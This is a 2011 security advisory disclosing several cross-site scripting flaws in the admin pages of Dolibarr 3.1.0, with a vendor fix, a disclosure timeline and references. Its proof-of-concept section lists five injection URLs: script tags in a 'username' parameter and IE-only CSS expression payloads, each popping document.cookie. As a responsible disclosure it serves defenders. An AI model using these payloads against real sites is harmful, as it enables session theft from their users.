Dolibarr version 3.1.0 suffers from multiple cross site scripting vulnerabilities.
73f62c78744b3f8b4d9c6c84e33979de78be6f662baa3b6b6eae31a30ae282d3
Advisory: Multiple Cross-Site-Scripting vulnerabilities in
Dolibarr 3.1.0
Advisory ID: INFOSERVE-ADV2011-03
Author: Stefan Schurtz
Contact: security@infoserve.de
Affected Software: Successfully tested on Dolibarr 3.1.0 other versions
may also be affected
Vendor URL: http://www.dolibarr.org/
Vendor Status: fixed in the 3.1 branch
==========================
Vulnerability Description
==========================
Dolibarr 3.1.0 is prone to multiple XSS vulnerability
==================
PoC-Exploit
==================
Cross-Site-Scripting - parameter 'username'
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</
script><script>alert(document.cookie)</script>
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</
script><script>alert(document.cookie)</script>&=3&optioncss=print
IE-only
http://<target>/admin/security_other.php/"
stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/events.php/"
stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/user.php/"
stYle="x:expre/**/ssion(alert(document.cookie))
=========
Solution:
=========
Fixed in the 3.1 branch
====================
Disclosure Timeline:
====================
08-Nov-2011 - vendor informed
09-Nov-2011 - vendor fix in the 3.1 branch
09-Nov-2011 - release date of this security advisory
========
Credits:
========
Vulnerabilities found and advisory written by the INFOSERVE Security Team
===========
References:
===========
https://doliforge.org/tracker/?func=detail&aid=232&group_id=144
https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e3544a4
207e78a1
http://www.dolibarr.org/
Best regards,
Stefan Schurtz | SECURE INFRASTRUCTURE
INFOSERVE GmbH | Am Felsbrunnen 15 | D-66119 Saarbrücken
Fon +49 (0)681 88008-52 | Fax +49 (0)681 88008-33 | s.schurtz@infoserve.de |
www.infoserve.de
Handelsregister: Amtsgericht Saarbrücken, HRB 11001 | Erfüllungsort:
Saarbrücken
Geschäftsführer: Dr. Stefan Leinenbach | Ust-IdNr.: DE168970599